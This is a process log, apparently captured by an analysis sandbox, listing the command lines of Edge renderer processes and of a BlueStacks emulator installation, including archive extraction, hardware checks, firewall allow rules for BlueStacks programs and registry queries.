C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6300 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9444 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7636 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7456 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10668 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7228 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6848 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10888 /prefetch:8

C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe

"C:\Users\Admin\Downloads\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\BlueStacksInstaller.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe" --cmd checkHypervEnabled

C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0CE5F193\HD-CheckCpu.exe" --cmd checkSSE4

C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe

"C:\Users\Admin\AppData\Local\BlueStacksSetup\BSX-Setup-5.14.22.1003_nxt.exe" -s -cpath=F:/

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "F:\BlueStacks X\green.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c green.bat

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name="BlueStacksWeb"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall delete rule name="Cloud Game"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="BlueStacksWeb" dir=in action=allow program="F:\BlueStacks X\BlueStacksWeb.exe"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Cloud Game" dir=in action=allow program="F:\BlueStacks X\Cloud Game.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10624 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10132 /prefetch:1

C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe

"C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe" -versionMachineID=27eb52f0-7c66-4fcd-a395-7a81e9b2975a -machineID=7636e141-ab64-4cdc-837e-a924a6eee602 -pddir="F:\BlueStacks_nxt" -defaultImageName=Pie64 -imageToLaunch=Pie64 -isSSE4Available=1 -appToLaunch=bs5 -bsxVersion=10.5.22.1006 -country=GB -isWalletFeatureEnabled

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe" -versionMachineID=27eb52f0-7c66-4fcd-a395-7a81e9b2975a -machineID=7636e141-ab64-4cdc-837e-a924a6eee602 -pddir="F:\BlueStacks_nxt" -defaultImageName=Pie64 -imageToLaunch=Pie64 -isSSE4Available=1 -appToLaunch=bs5 -bsxVersion=10.5.22.1006 -country=GB -isWalletFeatureEnabled

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\BlueStacksInstaller.exe" -versionMachineID="27eb52f0-7c66-4fcd-a395-7a81e9b2975a" -machineID="7636e141-ab64-4cdc-837e-a924a6eee602" -pddir="F:\BlueStacks_nxt" -defaultImageName="Pie64" -imageToLaunch="Pie64" -appToLaunch="bs5" -bsxVersion="10.5.22.1006" -country="GB" -isWalletFeatureEnabled -parentpath="C:\Users\Admin\AppData\Local\BlueStacksSetup\BlueStacksInstaller_5.14.22.1003_native_e0175934c4a0a56f1db683585ffd1bcf.exe" -md5=e0175934c4a0a56f1db683585ffd1bcf -app64=

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\CommonInstallUtils.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\" -aoa

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\QtRedistx64.zip" -o"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\" -aoa

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-ForceGPU.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-ForceGPU.exe" 1 "C:\Program Files\BlueStacks_nxt"

C:\ProgramData\BlueStacksServicesSetup.exe

"C:\ProgramData\BlueStacksServicesSetup.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq BlueStacksServices.exe" | find "BlueStacksServices.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "USERNAME eq Admin" /FI "IMAGENAME eq BlueStacksServices.exe"

C:\Windows\SysWOW64\find.exe

find "BlueStacksServices.exe"

C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe

"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --hidden --initialLaunch

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10616 /prefetch:1

C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe

"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cscript.exe

cscript.exe

C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe

"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --mojo-platform-channel-handle=1996 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKCU\SOFTWARE\BlueStacksServices

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKCU\SOFTWARE\BlueStacksServices

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regPutValue.wsf A

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regPutValue.wsf A

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"

C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe

"C:\Users\Admin\AppData\Local\Programs\bluestacks-services\BlueStacksServices.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\bluestacks-services" --app-user-model-id=com.bluestacks.services --app-path="C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\app.asar" --enable-sandbox --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2580 --field-trial-handle=1752,i,6523308688860315722,5279011738345694822,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 1 2

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 4 2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 2 2

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 1 1

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 4 1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe" 2 1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10920 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe" --cmd checkSSE4

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\PF.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\\HD-GLCheck.exe" 2

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\\HD-GLCheck.exe" 3

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-GLCheck.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\\HD-GLCheck.exe" 1

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\QtRedistx64.zip" -o"C:\Program Files\BlueStacks_nxt" -aoa

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq HD-Player.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq BlueStacks X.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\PD.zip" -o"F:\BlueStacks_nxt" -aoa

C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\7zr.exe" x "F:\Pie64_5.14.22.1003.exe" -o"F:\BlueStacks_nxt\Engine\Pie64" -aoa

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A "HKCU\SOFTWARE\BlueStacks X"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq HD-Player.exe""

C:\Windows\system32\cscript.exe

cscript.exe //Nologo C:\Users\Admin\AppData\Local\Programs\bluestacks-services\resources\regedit\vbs\regList.wsf A HKLM\SOFTWARE\BlueStacks_nxt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist /FI "IMAGENAME eq BlueStacks X.exe""

